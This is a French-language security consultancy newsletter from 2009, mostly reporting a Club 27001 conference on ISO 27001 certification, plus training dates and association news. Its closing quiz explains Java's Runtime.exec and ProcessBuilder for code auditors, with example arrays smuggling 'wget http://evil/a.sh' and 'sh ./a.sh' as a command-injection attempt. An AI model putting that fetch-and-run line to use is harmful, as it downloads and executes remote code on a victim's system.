[Newsletter HSC] N°64 - Décembre 2009
Newsletter d'information de HSC
newsletter at hsc-news.com
Mer 2 Déc 11:20:13 CET 2009
========================================================================
HSC Newsletter -- N°064 -- decembre 2009
========================================================================
"Je suis adroit de la main gauche et je suis gauche de la main droite."
[ Raymond Devos ]
--[ Sommaire ]----------------------------------------------------------
1. Editorial : gratuité de la normalisation
2. Le saviez vous ? La question
3. Compte-rendu de la conférence du Club 27001 du 19 novembre
4. Agenda des interventions publiques
5. Prochaines formations HSC
!! Rennes : session supplémentaire pour ISO 27005 en janvier !!
6. Actualité des associations : Club 27001, Clusif et OSSIR
7. Le saviez vous ? La réponse
--[ 1. Editorial - Hervé Schauer ]--------------------------------------
La normalisation est désormais gratuite pour les PME !
Ce mois-ci j'ai reçu le message suivant :
"Les pièces que vous nous avez transmises vous permettent d'être
exonéré de toute participation financière pour être membre de la
CN IQLS en 2010..."
Un immense message d'espoir pour les générations futures, pour
ceux qui pensent que décidément rien ne change....
1986 - 2010 : 24 ans de lutte avec l'AFNOR, sa partie AFNOR Normalisation,
et le Ministère de l'Industrie. Devoir payer pour travailler bénévolement
à la rédaction, la relecture, la correction ou la traduction de normes
n'était une bonne idée. Je suis entré en normalisation avec POSIX en 1986,
puis j'ai été éjecté pour non paiement de cotisation... 24 ans pour obtenir
gain de cause et ne plus devoir débourser plusieurs milliers d'euros chaque
année pour venir à l'AFNOR Normalisation et pouvoir participer.
C'est dans le décret paru le 17 juin [1], à l'article 14, qu'il est écrit :
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Il peut être demandé une participation aux frais d'élaboration d'une norme
aux membres des commissions de normalisation prévue au II de l'article 12.
Toutefois, il ne peut être demandé de participation aux frais d'élaboration
d'une norme aux associations de consommateurs et aux associations de
protection de l'environnement agréées compte tenu de leur représentativité
sur le plan national, aux syndicats représentatifs de salariés, aux petites
et moyennes entreprises de moins de 250 salariés ne dépendant pas à plus
de 25 % d'un groupe de plus de 250 salariés, aux établissements publics
d'enseignement et aux établissements publics à caractère scientifique et
technologique, ainsi qu'aux départements ministériels au titre de la
participation de leur responsable ministériel aux normes et de leur suppléant.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Note : il faut aussi ajouter "chiffre d'affaires inférieur à 43 Meuros".
Désormais, plus personne ne peut argumenter que c'est à cause du coût
qu'il refuse de participer à l'élaboration des normes qui construisent
notre futur. En sécurité de l'information, mais également dans tous
les domaines : formats, interopérabilité, archivage, continuité d'activité,
gestion des risques, protection de la vie privée, etc., tous les consultants
indépendants, toutes les petites sociétés, les associations, et tous les
établissements d'enseignement, doivent désormais se faire un devoir de
saisir cette chance qui leur est offerte de pouvoir participer à la
normalisation. Leur contribution active permettra d'équilibrer utilement
les forces en présence.
[1] Le décret fixant la mission de l'AFNOR du 17 juin 2009 :
http://www.legifrance.gouv.fr/affichTexte.do;jsessionid=?cidTexte=JORFTEXT000020749979&dateTexte=&oldAction=rechJO&categorieLien=id
--[ 2. Le saviez vous ? La question ]-----------------------------------
Connaissez vous deux moyens en Java de lancer des programmes externes ?
--[ 3. Compte-rendu de la conférence du Club 27001 du 19 novembre ]-----
par Frédéric Connes
Le 19 novembre dernier était organisée à l'Usine-St Denis la troisième
conférence du Club 27001 (http://www.club-27001.fr/).
Après une présentation des intervenants de la journée par Eric Doyen,
président du Club 27001, Alain de Greve, coordinateur pour la Belgique des
experts ISO en sécurité, prend la parole. Il précise qu'il remplace Angelika
Platte, qui n'a pas pu se libérer. L'exposé porte sur la situation des
travaux du comité ISO/IEC JTC 1/SC27 et les dernières évolutions des normes
270xx. La présentation commence par un aperçu de la structure de l'ISO et
détaille ensuite le processus de normalisation, qui est le fruit d'une
collaboration entre de nombreux états et organismes de tailles diverses,
des réunions se tenant tous les six mois. La première étape est celle de
l'étude de faisabilité d'un nouveau projet, qui se conclut par un vote des
comités. Si le résultat est positif, le travail d'écriture commence pour
aboutir à un "working draft". Plusieurs itérations de six mois peuvent être
nécessaires avant d'aboutir à un texte mûr. Ensuite, chaque état doit
appuyer ou non le projet, qui devient s'il est accepté un "committee draft".
Dans une quatrième phase, le texte fait encore l'objet de discussions sur
des points précis, jusqu'à devenir un "draft international standard" qui
est finalement soumis à un vote élargi, posant rarement problème. Le texte
devient alors une norme internationale (international standard) publiée.
Au total, l'ensemble de la procédure prend en moyenne 2,8 années, et
des révisions sont entreprises tous les cinq ans ou en cas de rapport
d'anomalie. L'attention se concentre ensuite sur le sous-comité SC27, qui
compte actuellement 42 "P-members", c'est-à-dire membres actifs, et 14
"O-members", qui sont des observateurs (voir http://www.jtc1sc27.din.de/).
Les groupes de travail 1 et 4 de ce sous-comité traitent de la série de normes
27000. Alain de Greve présente l'avancée prévisionnelle des travaux sur les
normes 270xx par le groupe 1, et détaille une proposition canadienne de
taxonomie de la norme 27002, en discussion car certains états y sont
opposés. Il s'agirait de diviser la norme en six parties (Security Strategy
& Governance, Information Security Mgmt & Ops, Information Security,
Physical & Environmental Security, Personnel Security, IT Security), chacune
d'entre elles étant divisée en 6 sous-parties, pour aboutir à un total de
plus de 300 mesures de sécurité, contre 133 aujourd'hui. Cette
réorganisation a pour objectif de mieux structurer la norme et de permettre
plus de finesse dans la sélection des mesures. L'exposé se termine par les
perspectives de travail pour le groupe 4, qui traite des mesures et des
services de sécurité.
Le deuxième intervenant est Eric Wiatrowski, responsable sécurité chez
Orange Business Services, qui traite de "l'aventure d'une certification", en
l'occurrence celle du "Master Service Center" du Caire. La présentation
commence par le rappel de quelques éléments de contexte sur OBS, qui est une
marque de services dans le monde regroupant notamment France Télécom, Orange
et Equant, pour un total d'environ 20 000 personnes. Le groupe a une
stratégie globale de conformité à ISO 27001 et une stratégie locale de
certification (Centertel en Pologne et PCS au Royaume-Uni ont été
précurseurs). L'exposé explique les raisons de la certification, qui sont à
rechercher dans une certaine pression des clients, un contexte favorable
(conformité groupe, certifications ISO 15048, SAS 70 et ISO 9001) et
également la concurrence, qui incite à rechercher des éléments
différenciant. De plus, la certification permet de motiver les personnels
et répond, dans certains pays, à une demande émergente lors de l'attribution
de licences télécom. Eric Wiatrowski poursuit sa présentation par les
grandes étapes de la certification, en commençant par le choix du périmètre.
Il s'agissait ici de choisir une activité et un site représentatifs, sans
ambition excessive. En pratique, c'est le "Master Service Center" du Caire,
regroupant plus de 1000 personnes, qui a été sélectionné. Un budget a été
alloué fin 2007, et le premier audit interne a été mené en juillet 2008,
avant l'organisation d'un audit externe à blanc deux mois plus tard par
Deloitte. Après quelques corrections, l'audit de certification a été mené en
novembre 2008 par AFNOR Certification. Cette démarche a obligé l'entreprise
à nommer et à former un responsable sécurité local, et à lancer une campagne
de sensibilisation à la sécurité. Au final, un communiqué de presse a été
publié et aujourd'hui les managers sont plus impliqués dans la sécurité.
Pour terminer, les facteurs clés de succès sont détaillés. Il s'agit
notamment du choix des partenaires, de l'encouragement des équipes, de
l'utilisation de l'existant et de la mutualisation des certifications, qui
réduit les perturbations opérationnelles. Le bilan est positif, puisque la
certification apporte un avantage compétitif certain, ainsi qu'une émulation
entre les équipes. Le coût total est estimé à 6 hommes-mois.
Après une pause, Sandrine Lanery, directrice des opérations chez Easynet
France, débute sa présentation sur "Maintenir sa certification ISO 27001".
Easynet est un fournisseur de services globaux (hébergement, téléprésence,
services IP) employant 110 personnes en France et disposant de datacenters
dans le monde entier. L'entreprise s'est récemment orientée vers la sécurité
en raison d'audits demandés par ses clients, et a recherché la conformité
avec la norme ISO 27001. Le projet a été lancé en octobre 2007 et a
nécessité l'intervention du Group Information Security Manager, maîtrisant
la norme, et d'un consultant qualité. De plus, un Security Forum a été
constitué, qui est une structure toujours en place ayant des responsabilités
dans les ressources humaines, les aspects juridiques, le service d'hébergement
et la sécurité physique et logique, qui se réunit tous les trois mois. Tous
les documents ont été rédigés à la fois en français et en anglais.
Finalement, la certification a été obtenue de BSI le 15 juillet 2008. Le
périmètre du SMSI comportait le datacenter français et les solutions
hébergées, et la déclaration d'applicabilité recensait 103 mesures de
sécurité. Du point de vue de la démarche adoptée, la méthodologie du groupe
a été reprise, notamment en termes de plan de continuité et de tests
réguliers, avec des adaptations aux pratiques locales françaises. Un
programme de prise de conscience de la sécurité a été mis en place, en
particulier avec des actions de sensibilisation, des sessions de formation
ou encore l'organisation de quizz. Par ailleurs, de nombreuses procédures
ont été formalisées. Cependant, l'organisation d'Easynet a évolué,
notamment l'arrêt du soutien du Group Information Security Manager, et au
bout d'un an il a été décidé de faire un bilan, qui a été confié à HSC. Ce
bilan a mis en évidence les difficultés de maintenir le SMSI dues à
l'absence de propriétaire, tant dans le suivi au quotidien que dans
l'application de la boucle PDCA. Easynet a donc décidé de se réapproprier
le SMSI, par la mise en place de workshops (revue des actifs, des risques,
des documents...), une révision des mesures d'efficacité, des audits de
contrôle, l'approbation d'un budget d'assistance et l'optimisation des
réunions du Security Forum. Cette démarche a permis l'appropriation du SMSI
en local et a servi d'exemple de ce qui pourrait être fait dans d'autres
filiales européennes d'Easynet.
L'intervention de Jean-Louis Coulon, directeur général du groupe Réunica,
vient clore la matinée. Elle porte sur la sécurité des systèmes
d'information au sein du GIE Systalians. L'orateur rappelle d'abord que le
groupe Réunica est le deuxième groupe de retraite complémentaire en France
et que Systalians est le GIE Informatique du groupe Reunica-Bayard. La
protection sociale est aujourd'hui un enjeu de société, car le modèle issu
de la Seconde Guerre mondiale ne semble plus pérenne. Des réformes et
modifications profondes sont en cours, et dans ce cadre la sécurité apparaît
comme un enjeu majeur, relevant de la direction générale. Pour y répondre,
un programme stratégique baptisé "PS10" a été mis en place, qui est un
système de management des risques et de la qualité au sein du groupe. Il
doit permettre une mise en conformité avec les différentes contraintes
réglementaires, qui sont notamment le règlement de sécurité des fédérations
AGIRC et ARRCO, fondé sur ISO 27002, et, à partir de 2012, la directive
Solvency II, qui s'applique notamment aux compagnies d'assurance et aux
mutuelles. L'orateur évoque ensuite les enjeux de la certification ISO 27001,
qui sont principalement de se démarquer dans le secteur et de renforcer la
confiance des clients, sans pour autant aller trop loin. Il précise que
Systalians mène une approche globale des systèmes de management, avec une
certification ISO 9001 en 2001, 20000-1 en 2004 et 27001 en 2009. Sur 27001,
la démarche de certification a duré deux ans et s'est conclue par
l'obtention du certificat en juillet 2009, délivré par LSTI. Un bilan
initial a été mené en 2007, qui a conduit à la mise en place de nombreux
projets techniques, tels que la réalisation de tests deux fois par an,
l'installation de systèmes redondants, le renforcement des systèmes de
contrôle et la création d'un chapitre sécurité dans tous les projets. Le
SMSI de Systalians a été défini, et regroupe l'ensemble des activités
métiers et des sites, soit 64 actifs dont 13 critiques. Au total, 126
mesures de sécurité ont été sélectionneés. La volonté manifestée au plus
haut niveau, la forte mobilisation des équipes internes et l'accompagnement
au quotidien ont joué un rôle déterminant dans le succès de la certification.
Finalement, celle-ci a permis de réduire les coûts, de renforcer la
confiance et d'améliorer la sécurité dans le temps. Il reste maintenant à
optimiser l'intégration des systèmes de management, à rationaliser les
démarches et à intégrer Solvency II.
L'après-midi débute avec la présentation de François Morris, RSSI du siège
du CNRS, qui porte sur "La SSI au CNRS, évolution vers un SMSI". Après un
rapide aperçu de la structure du CNRS, qui est complexe, l'organisation de
la SSI est présentée. Une distinction est faite entre la chaîne
fonctionnelle, tant à l'échelle nationale, régionale que locale, et la
chaîne hiérarchique. La SSI est une préoccupation ancienne, qui remonte au
moins à 1997 pour les procédures documentées. Un bulletin spécialisé est
édité depuis 1994, des formations sont organisées depuis 1990 et un groupe
de travail CAPSEC a été installé en 2005, qui est chargé d'établir des
documents et des guides. L'intervenant revient ensuite sur la mise en place
d'un SMSI, qui répond à la nécessité de franchir une étape, de pérenniser,
de formaliser, et d'accroître le pilotage. Le besoin de SSI est justifié par
l'existence de risques réels et aussi par le milieu très compétitif dans
lequel s'insère le CNRS. Une PSSI est en place depuis fin 2006, mais elle
dépasse largement le cadre d'une PSSI stricto sensu, puisqu'elle contient
beaucoup d'éléments d'un SMSI et divers documents exigés par la norme
ISO 27001. Il faut noter ici qu'il s'avère très difficile d'imposer la SSI
en raison de la culture libertaire de l'organisme. Les opérations de
formation sont détaillées, car il s'agit d'un des principaux leviers pour
agir au CNRS. 24 personnes ont été certifiées ISO 27001 Lead Implementer par
LSTI en 2008 et des formations sont prévues en région en 2009-2010, qui
ne visent toutefois pas la certification des personnels. Pour ce qui est des
méthodes et outils employés, la PSSI est déclinée au niveau local, avec une
appréciation des risques uniquement sur les spécificités locales et la
reprise des mesures établies à l'échelle nationale. De plus, la déclaration
d'applicabilité est déjà en grande partie réalisée. Par ailleurs, une
mutualisation des efforts a été entreprise avec la constitution et la mise
en commun de procédures et de documents génériques. Des exemples de tableaux
reprenant l'annexe A de la norme ISO 27001 sont présentés. Finalement, les
apports de la démarche SMSI sont la mise en place d'un référentiel commun au
sein du CNRS et le passage d'une culture orale à une culture écrite qui
préserve mieux la mémoire de l'organisme. Les perspectives d'avenir sont
l'extension du déploiement dans les différentes unités, toutes les régions
devant être concernées d'ici six mois, le recours croissant à
l'accompagnement dans chaque entité et une démarche de certification pour
certains périmètres. Ainsi, aujourd'hui, l'optique est devenue plus
managériale que technique.
L'orateur suivant est Loïc Guézo d'IBM France, qui traite du retour
d'expérience de son entreprise sur la certification ISO/IEC 27001. Il
commence par expliquer qu'IBM assure la gestion des systèmes d'information
des entreprises avec ses services d'outsourcing, répartis sur six sites en
France et regroupant des dizaines de milliers de serveurs. Dès lors,
l'entreprise doit fournir des garanties de niveaux de service et répondre à
des exigences de sécurité, ce qui l'a amenée à envisager une certification
ISO 27001, d'autant que son mode de fonctionnement était déjà proche de la
démarche PDCA. Le management a donc apporté son soutien au projet dès 2005
et a décidé de procéder à une double certification ISO 20000 et 27001. Une
équipe de trois personnes a été constituée pour superviser les deux
certifications. Elle était composée d'un chef de projet, d'un leader
ISO 20000 et d'un leader ISO 27001, et a procédé à une analyse des
processus existants et à une comparaison avec les exigences des normes,
ce qui a permis d'identifier les principaux deltas. Ces derniers
provenaient de procédures manquantes et, surtout, d'un manque de
communication entre les processus. A partir de là, des plans d'action ont pu
être mis en oeuvre pour résoudre les problèmes, notamment par l'écriture
des procédures manquantes et la mise en place d'une meilleure coordination
entre les services, avec en particulier des réunions hebdomadaires et
mensuelles. Finalement, tous les contrôles ont été pris en compte pour
répondre aux besoins des clients. L'intervenant détaille ensuite les
difficultés rencontrées, qui tiennent essentiellement au fonctionnement
vertical (en "towers") de l'entreprise et à la nécessité de correctement
prendre en compte les contraintes des clients. Les points négatifs constatés
ont été la consommation de temps, la difficulté d'impliquer toutes les
équipes et la quantité de documents à traiter. A l'inverse, ont été
considérés comme des points positifs l'amélioration de la coordination entre
les équipes, la mise en place de références croisées et le nettoyage des
procédures existantes. Les deux certifications ont été obtenues en octobre
2007 de Bureau Veritas. Aujourd'hui, l'existence du certificat est
mentionnée dans toutes les propositions commerciales.
Gérôme Billois, de Solucom, prend ensuite la parole pour évoquer la
"certification ISO 27001 des prestations d'audit de sécurité des SI" de son
entreprise. Il commence par rappeler que Solucom est un cabinet de conseil
en management et système d'information, regroupant environ 1000
collaborateurs, qui a obtenu la certification ISO 27001 le 18 septembre 2008
sur le périmètre de ses prestations d'audit de sécurité. L'entreprise
réalise environ 150 audits de sécurité par an avec une équipe de 15
auditeurs en faisant appel ponctuellement à d'autre consultants du
département des services en sécurité qui totalise environ 150 personnes.
Ses services d'audit apparaissent comme sensibles, notamment en raison de
l'importance de préserver la confidentialité et l'intégrité des traces
collectées et des conclusions. La certification a été recherchée pour
différencier les prestations sur le marché et montrer que l'entreprise était
compétente pour accompagner ses clients sur les projets ISO 27001. Une
réflexion a d'abord été menée sur le périmètre du SMSI, qui intégre
notamment les auditeurs débutant ou finissant une mission et est donc à
taille variable. La sortie du périmètre se fait en cas de départ de la
société ou au bout d'un an sans activité d'audit. Les processus concernés
sont ceux qui gèrent le SMSI, le SI d'audit et les missions d'audit. La
déclaration d'applicabilité comportait 114 mesures de sécurité. De nouvelles
pratiques PDCA incluant la sensibilisation et des indicateurs d'activité et
d'efficacité ont été mises en oeuvre et un focus particulier a été mis sur
le contrôle. Le projet a représenté au total 80 jours-hommes et les tâches
récurrentes sont évaluées à environ 40 jours-hommes par an. Au final,
Solucom a bénéficié de certaines facilités, comme l'expertise interne sur
les normes, mais a aussi dû se confronter à certains challenges, comme
faire adopter le principe des conventions de service et identifier un
outillage sécurité conforme aux exigences des auditeurs. Un an plus tard,
la base apparaît solide et capable de supporter des évolutions, comme
le passage de 23 à 36 actifs et de 15 risques majeurs et significatifs à
8 risques significatifs. De plus, la certification a permis
l'identification de points d'attention grâce à l'audit, et la mise en
oeuvre de pratiques opérationnelles simples. Il s'agit donc d'un succès
avec des retours internes positifs.
La dernière présentation est celle de Nicolas Mayer, du centre de recherche
publique Henri Tudor au Luxembourg. Elle porte sur les "initiatives pour
l'adoption par les PME de l'ISO/IEC 27001 au Luxembourg". L'intervention
commence par une présentation du centre, qui fait de la recherche appliquée
à un horizon de deux à trois années. Il dispose d'un financement privé et
public à parts égales et regroupe 350 personnes dont 120 travaillent sur les
technologies de l'information et de la communication. Le centre a collaboré
avec le Ministère de l'Economie et du Commerce extérieur du Luxembourg sur un
projet baptisé "ISMS-PME", dont l'objectif est la rédaction d'un guide
d'implémentation d'un SMSI adapté aux PME, avec la réalisation de modèles et
d'outils logiciels supports de la démarche. Une expérimentation initiale a
été conduite avec l'entreprise Codasystem, le but étant de maîtriser la
norme ISO 27001 et de développer les compétences sur l'implémentation d'un
SMSI. L'expérience s'est déroulée de juin 2006 à mai 2008 et a nécessité
l'investissement d'environ 100 jours-hommes. Après de nombreuses adaptations
liées notamment au manque de maturité organisationnelle, au besoin de
formation et à l'absence de procédures formalisées, Codasystem est
finalement devenue la première entreprise privée à obtenir la certification
au Luxembourg. Dans une deuxième phase, le projet ISMS-PME avait pour
objectif de produire le guide. Dans cette perspective, des objectifs ont
d'abord été établis, puis le guide a été réalisé. Il reprend et réduit les
exigences de la norme ISO 27001 et simplifie la présentation. Deux outils
ont été formalisés, l'un étant une appréciation des risques suivant la norme
ISO 27005 et l'autre une "gap analysis" ISO 27001. Par ailleurs, un ensemble
de modèles, utilisables tels quels ou comme exemples, a été réalisé. Ensuite,
le guide a été soumis à une revue par une douzaine d'experts et a été soumis
à une expérimentation. Le Ministère de l'Economie luxembourgeois a ainsi
initié la mise en place un SMSI dans deux directions en avril 2009, avec un
achèvement prévu en décembre 2009. Le contexte était en effet favorable, avec
une bonne culture SSI et la réalisation en 2006 d'une appréciation des
risques EBIOS. La compétence des personnes impliquées s'est révélée positive,
tandis que l'implication insuffisante de la direction a été perçue
négativement. Deux autres expérimentations ont concerné l'Administration de
la navigation aérienne (ANA) du Luxembourg et l'entreprise IFOnline, qui
emploie quatre personnes. Elles ont débuté en octobre 2009 et doivent
s'achever en mars 2010. ANA est déjà certifiée ISO 9001 et ses systèmes
critiques sont déjà contrôlés par des entités externes, tandis que IFOnline
a une bonne culture sécurité mais manque de formalisation. Les premières
conclusions montrent que le guide et les outils ont une valeur ajoutée plus
importante avec un organisme peu mature. Les premiers résultats ont été
transférés au réseau "Cassis". Pour finir, l'intervenant détaille les
perspectives d'avenir et notamment l'accompagnement en grappe, qui consiste
à suivre entre trois et cinq entreprises simultanément afin de réduire les
coûts, avec des sessions de formation et de coaching. Cette phase doit
s'étaler de janvier à juillet 2010 et doit permettre d'améliorer le taux de
pénétration de la norme ISO 27001 au Luxembourg.
La journée s'achève avec la table ronde animée par Anne Confolant du site
ITespresso.fr. Les participants sont Béatrice Porrot, responsable commerciale
chez LRQA France, Philippe Bourdalé, chef de projet chez AFNOR Certification,
et Philippe Bouchet, directeur des opérations et auditeur chez LSTI.
La journaliste commence par demander aux participants pourquoi si peu
d'entreprises sont actuellement certifiées ISO 27001. Béatrice Porrot
explique que la norme est émergente et qu'aucune disposition contraignante
n'impose aux entreprises de se faire certifier. Dès lors, celles-ci ont du
mal à percevoir le retour sur investissement. Philippe Bouchet estime quant
à lui qu'on parle beaucoup de la norme sans qu'il y ait de retombées
concrètes, mais il espère une évolution rapide sur ce point. Enfin, Philippe
Bourdalé nuance les propos précédents en affirmant que certains de ses
clients ont des contraintes pour se certifier. Anne Confolant souhaite alors
savoir qui se certifie. Béatrice Porrot évoque les caisses de retraite,
tandis que Philippe Bouchet estime qu'il s'agit aussi des SSII, des
opérateurs télécom et des datacenters. Philippe Bourdalé pense que la
certification correspond à un véritable projet d'entreprise, qui a un coût.
La question est alors posée de savoir s'il n'y aurait pas un déficit de
communication autour de la norme. Pour Philippe Bourdalé, les organismes
certificateurs ont une attitude attentiste, alors qu'ils devraient être
plus dynamiques et faire identifier aux entreprises leurs besoins de
certification. Philippe Bouchet estime lui aussi que les organismes de
certification ont un rôle à jouer, mais que c'est avant tout aux formateurs
d'apporter des clients. Finalement, la conférence est close par Eric Doyen,
qui remercie les participants.
Note d'Hervé Schauer : HSC remercie chaleureusement Orange, Deloitte,
Easynet, Systalians, le CNRS, IBM, Solucom, le CRPHT et LRQA pour avoir
fait confiance aux formations ISO 27001 & ISO 27005 dispensées par HSC.
--[ 4. Agenda des interventions publiques ]-----------------------------
- 3 décembre 2009 : Conférence JRES 2009 - Nantes
Participation à la table ronde "D'EBIOS à la réalité du terrain, comment
mettre en oeuvre une politique de sécurité cohérente et pragmatique ?"
Hervé Schauer
https://2009.jres.org/planning?planning_aid=149
Retrouvez l'agenda de nos interventions publiques sur
http://www.hsc.fr/conferences/agenda.html.fr
--[ 5. Prochaines formations HSC ]--------------------------------------
Nos prochaines formations sont les suivantes :
- Paris
ISO 27005 Risk Manager .............. : 2 au 4 décembre (G)
ISO 27001 Lead Implementer .......... : 7 au 11 décembre (G)(C)
ISO 27001 Lead Auditor .............. : 14 au 18 décembre (G)
ISO 20000-1 Lead Auditor ............ : 11 au 15 janvier
ISO 27005 Risk Manager .............. : 13 au 15 janvier
ISO 27001 Lead Auditor .............. : 18 au 22 janvier
Gestion des identités et des accès .. : 25 au 27 janvier
Juridique de la SSI ................. : 28 et 29 janvier
ISO 27001 Lead Implementer .......... : 1 au 5 février
Réalisation pratique des Tests d'Intrusion : 8 au 12 février (*)
Essentiel de la série ISO 27001 ..... : 18 et 19 février
DNS par la pratique .................. : 8 mars (*)
Postfix par la pratique ............. : 9 mars (*)
Lutte contre le spam par la pratique . : 10 et 11 mars (*)
Sécurité Unix et Linux ............... : 11 et 12 mars (*)
Sécurité des serveurs et applications web : 29 au 31 mars (*)
Sécurité du WiFi ..................... : 1 et 2 avril (*)
Mutualisation ISO 27001/autres référentiels : 6 avril
Présentation de la certification ISO 27001 : 7 avril
Indicateurs et tableaux de bord SSI . : 8 avril
Programmation sécurisée en PHP ...... : 7 au 9 avril (*)
Fondamentaux de la SSI .............. : 29 et 30 avril
Sécurité de la VoIP .................. : 25 mai
(*) : formations pratiques avec un ordinateur par stagiaire
(C) : formations complètes au niveau des pré-inscriptions
(G) : information importante : en cas de déclenchement du niveau 5B ou 6
du plan national de pandémie grippale, certaines "mesures barrières de
freinage et de limitation d'extension de la maladie" risquent d'empêcher le
déroulement normal des formations (interruption des transports collectifs,
restriction des activités professionnelles...). Dans ce cas, les personnes
inscrites ou pré-inscrites aux sessions de formation impactées se verront
proposer des places prioritaires sur des sessions de remplacement planifiées
aux mois de décembre et de janvier :
ISO 27001 Lead Implementer : 11 au 15 janvier, puis surcharge en février
ISO 27001 Lead Auditor : surcharge du 18 au 22 janvier
ISO 27005 Risk Manager : 21 au 23 décembre
- Genève (Suisse)
ISO 27001 Lead Auditor .............. : 8 au 12 février 2010
ISO 27005 Risk Manager .............. : 9 au 11 juin
- Luxembourg
ISO 27001 Lead Implementer .......... : 15 au 19 février
ISO 27001 Lead Auditor .............. : 26 au 30 avril
ISO 27005 Risk Manager .............. : 17 au 19 mai
- Lyon
ISO 27005 Risk Manager ............... : 2 au 4 juin
- Marseille
ISO 27005 Risk Manager .............. : 29 au 31 mars
- Nantes
ISO 27005 Risk Manager .............. : septembre ou octobre
- Nice
ISO 27001 Lead Implementer .......... : 28 juin au 2 juillet
- Niort
ISO 27005 Risk Manager .............. : 24 au 26 février
- Rennes
ISO 27005 Risk Manager .............. : 16 au 18 décembre (C)
!! Session supplémentaire !!
ISO 27005 Risk Manager .............. : 25 au 27 janvier
- Strasbourg
ISO 27001 Lead Implementer .......... : 22 au 26 février
- Toulouse
ISO 27001 Lead Auditor .............. : 1 au 5 mars
ISO 27005 Information Security Risk Manager : 3 au 5 mai
Pour tout renseignement, et pour vous inscrire pour toutes les villes
sauf Luxembourg, contactez Lynda Benchikh :
formations at hsc.fr -- +33 141 409 704
Pour les formations à Luxembourg contactez Sylvie Favaut de Dimension Data :
Sylvie.Favaut at eu.didata.com
Tél : +352 25 48 25 321 -- GSM : +352 621 31 20 88 -- Fax : +352 25 48 30
Rappel : pour 4 jours de formation consécutifs commandés
simultanément par la même personne, le 5ème jour est offert (sauf
formations d'une semaine et certifiantes).
Vous souhaitez des formations dans votre ville ? Contactez Hervé Schauer.
Retrouvez le détail de nos formations (plan pédagogique, agenda) ainsi que
notre catalogue sur http://www.hsc-formation.fr/
--[ 6. Actualité des associations : Club 27001 et OSSIR ]----------------
o Club 27001 (http://www.club-27001.fr/)
. Cf. compte-rendu de la conférence annuelle du Club du jeudi 19
novembre 2009 au paragraphe 3.
Les transparents des présentations ont été distribués aux participants
sur une clé USB
. Prochaine réunion à Paris le jeudi 14 janvier 2010
Les présentations sont en cours de confirmation.
. Prochaine réunion à Toulouse vendredi 4 décembre 2009 à 13h45
chez France Telecom à Blagnac, inscription auprès d'Anne Mur
ou Dominique Pourcelie obligatoire :
- Compte-rendu de la réunion du JTC1/SC27 par Lionel Vodzislawsky,
Oppida
- Débat sur l'évolution des normes et notamment de la DdA par
Laurent Piebois, Airbus
- Compte-rendu de la conférence annuelle du Club par Anne Mur
. Prochaine réunion à Marseille lundi 14 décembre 2009 à 9h30
au WTCenter Marseille.
- Présentation de l'activité du club, de la famille des normes
ISO27000 et de leurs évolutions par Marc Dovero, CG13
- Mise en place d'une politique de sécurité au sein de l'Éducation
Nationale par Jean-Louis Brunel, Ministère de l'Education Nationale
Inscrivez-vous sur la liste de Toulouse, Marseille, etc sur
www.club-27001.fr pour avoir l'activité des clubs en région.
o Clusif (http://www.clusif.asso.fr)
. Publication du document "PCI-DSS : une présentation" rédigé par le
groupe de travail PCI-DSS du Clusif auquel Hervé Schauer a participé :
http://www.clusif.asso.fr/fr/production/ouvrages/pdf/CLUSIF-2009-PCIDSS-Une-presentation.pdf
o OSSIR (http://www.ossir.org/)
. Prochaine réunion à Paris mardi 10 décembre à 14h00 à l'ENSAM salle C3
- Surveillance temps réel des communications électroniques
par Bastien Hillen, Scan & Target
- Les évolutions législatives autour du CIL par Bruno Rasle, AFCDP
. Réunion suivante le mardi 12 janvier 2010 avec l'assemblée générale
de l'association le matin
. Prochaine réunion à Toulouse début janvier (date pas encore fixée)
. Prochaine réunion à Rennes mardi 8 décembre à 14h15 chez Thomson R&D
- Analyse d'un botnet artisanal par Julien Lenoir, Sogeti
- Design et implémentation d'une solution de filtrage ARP par Patrice
Auffret, Thomson
. Prochaine réunion à Lyon annoncée bientôt
. JSSI de l'OSSIR à Paris le 16 Mars 2010 - réservez votre date
--[ 7. Le saviez vous ? La réponse ]-------------------------------------
La première méthode est bien connue par tous les auditeurs de code
J2EE, il s'agit de la méthode Exec de la classe java.lang.Runtime. Cette
classe permet également d'effectuer des actions réputées dangereuses,
comme importer de nouvelles bibliothèques dynamiques, ou d'arrêter la
VM. Les utilisations de cette classe sont donc particulièrement
recherchées dans les audits de sécurité. Il faut rappeler que cette
méthode ne lance pas de shell, et donc qu'une construction comme
String woof[] = {"ls",";","wget http://evil/a.sh",";","sh ./a.sh"};
try {
Process process = Runtime.getRuntime().exec(woof);
} catch (IOException e)
{
e.printStackTrace();
}
ne provoquera pas de catastrophe planétaire, puisque ";" ne sera pas
interprété.
Dans Java 1.5 sont apparues les méthodes de la classe
java.lang.ProcessBuilder, permettant également de lancer des programmes
externes, avec un plus grand contrôle sur son environnement (documentation
sur http://java.sun.com/j2se/1.5.0/docs/api/java/lang/ProcessBuilder.html)
String woof[] = {"ls",";","wget http://evil/a.sh",";","sh ./a.sh"};
try {
Process process = new ProcessBuilder(woof).start();
} catch (IOException e)
{
e.printStackTrace();
}
Un audit de code doit donc prendre en compte ces nouvelles méthodes, et
les recommandations de sécurité être adaptées ou tout au moins vérifiées à
chaque évolution majeure des environnements.
Plus d'informations sur la liste de diffusion newsletter